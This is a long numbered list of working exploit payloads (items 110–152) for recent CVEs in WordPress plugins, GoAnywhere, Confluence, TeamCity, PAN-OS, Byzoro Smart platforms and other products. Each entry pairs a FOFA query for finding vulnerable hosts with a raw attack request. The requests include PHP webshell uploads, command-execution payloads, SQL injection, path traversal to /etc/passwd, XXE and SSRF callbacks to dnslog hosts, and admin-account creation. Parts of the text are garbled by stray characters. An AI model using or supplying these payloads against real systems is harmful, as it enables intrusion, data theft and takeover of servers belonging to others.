Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
Side: download
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

ERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
java -jar jenkins-cli.jar help
 [COMMAND]
Lists all the available commands or a detailed description of single command.
 COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)


110. GoAnywhere MFT unauthenticated administrator account creation
CVE-2024-0204
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.1
Host: 192.168.40.130:8000
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


111. WordPress plugin HTML5 Video Player SQL injection
CVE-2024-1061
FOFA:"wordpress" && body="html5-video-player"
GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
Host: 192.168.40.130:112
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip


112. WordPress plugin NotificationX SQL injection
CVE-2024-1698
FOFA:body="/wp-content/plugins/notificationx"
POST /wp-json/notificationx/v1/analytics HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json

{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}


113. WordPress Automatic plugin arbitrary file download and SSRF
CVE-2024-27954
FOFA:"/wp-content/plugins/wp-automatic"
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

114. WordPress MasterStudy LMS plugin SQL injection
FOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/"
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close


115. WordPress Bricks Builder <= 1.9.6 RCE
CVE-2024-25600
FOFA:body="/wp-content/themes/bricks/"
Step 1: obtain the site's nonce value
GET / HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Connection: close
Accept-Encoding: gzip


Step 2: substitute the nonce value and execute the command
POST /wp-json/bricks/v1/render_element HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Content-Length: 356
Content-Type: application/json
Accept-Encoding: gzip

{
  "postId": "1",
  "nonce": "<value obtained in step 1>",
  "element": {
    "name": "container",
    "settings": {
      "hasLoop": "true",
      "query": {
        "useQueryEditor": true,
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",
        "objectType": "post"
      }
    }
  }
}

116. WordPress js-support-ticket file upload
FOFA:body="wp-content/plugins/js-support-ticket"
POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1
Host:
Content-Type: multipart/form-data; boundary=--------767099171
User-Agent: Mozilla/5.0

----------767099171
Content-Disposition: form-data; name="action"

configuration_saveconfiguration
----------767099171
Content-Disposition: form-data; name="form_request"

jssupportticket
----------767099171
Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
Content-Type: image/png

----------767099171--


117. WordPress LayerSlider plugin SQL injection
Version: 7.9.11 – 7.10.0
FOFA:body="/wp-content/plugins/LayerSlider/"
GET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1


118. Beijing Baichuo Smart S210 management platform uploadfile.php arbitrary file upload
CVE-2024-0939
FOFA:title="Smart管理平台"
POST /Tool/uploadfile.php? HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------13979701222747646634037182887
Content-Length: 405
Origin: https://192.168.40.130:8443
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="file_upload"; filename="contents.php"
Content-Type: application/octet-stream

<?php
system($_POST["passwd"]);
?>
-----------------------------13979701222747646634037182887
Content-Disposition: form-data; name="txt_path"

/home/src.php
-----------------------------13979701222747646634037182887--


Then access /home/src.php
119. Beijing Baichuo Smart S20 backend sysmanageajax.php SQL injection
CVE-2024-1254
FOFA:title="Smart管理平台"
Log in to the system first; the default credentials are admin/admin.
POST /sysmanage/sysmanageajax.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=b7e24f2cb8b51338e8531e0b50da49ee
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: https://58.18.133.60:8443
Referer: https://58.18.133.60:8443/sysmanage/manageadmin.php
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
X-Forwarded-For: 1.1.1.1
X-Originating-Ip: 1.1.1.1
X-Remote-Ip: 1.1.1.1
X-Remote-Addr: 1.1.1.1
Te: trailers
Connection: close

src=manageadmin&type=add&id=(select*from(select+if(length(database())=3,sleep(5),1))a)|1|1&value=test2|123456

120. Beijing Baichuo Smart S40 management platform import web.php arbitrary file upload
CVE-2024-1253
FOFA:title="Smart管理平台"
POST /useratte/web.php? HTTP/1.1
Host: ip:port
Cookie: PHPSESSID=cb5c0eb7b9fabee76431aaebfadae6db
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328


File path: /upload/2.php

121. Beijing Baichuo Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328


boot/web/upload/weblogo/1.php
122. Byzoro Smart s200 management platform /importexport.php SQL injection
CVE-2024-27718
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; plaintext: sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. Hunan Jianyan engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

http://192.168.40.130:8282/Scripts/abcgcg.aspx
125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin backend directly; system commands can then be executed.
126. Aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]
>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin URL: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)
132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 Cloud Mall file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

# `" \0 l1 ^$ ?; t- T* w0 x135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入
; x, u& s( ~2 f, c) F9 a1 @6 h) }" ICVE-2024-20226 j8 k1 H7 R& F
Netentsec NS-ASG Application Security Gateway 6.3版本0 u Z/ z! S2 ]8 g9 H D [( o
FOFA:app="网康科技-NS-ASG安全网关"
* x4 c7 ]( r$ i/ W7 x/ O8 x# q/ r( JGET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
8 \; u0 m9 y/ i& wHost: x.x.x.x8 P1 ^# L" P. d/ I# Q3 E- t
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
0 _; Y L' j1 p2 RAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
% H8 j9 m m+ j+ F/ A! c; n( [Accept-Encoding: gzip, deflate7 c: T e6 r7 ~3 u0 Q9 k4 a
Accept-Language: zh-CN,zh;q=0.94 o2 O; E+ v1 B, P, i C
Connection: close
7 H/ _! \7 v! H8 P9 g8 D9 a1 R3 C( Z( B
136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kelixun communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kelixun communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kelixun communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kelixun communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kelixun communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

% _% `. w& R$ R3 b6 g' R142. CMSV6车辆监控平台系统中存在弱密码
: |( X0 f: {$ o8 A- \CVE-2024-29666
) N2 h) C/ ^$ t4 D9 jFOFA:body="/808gps/"1 F' U) t [$ X0 m( j; ^, }) ?4 L# c
admin/admin& k0 X+ i4 y. F6 S8 X/ n
143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD
144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"

POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
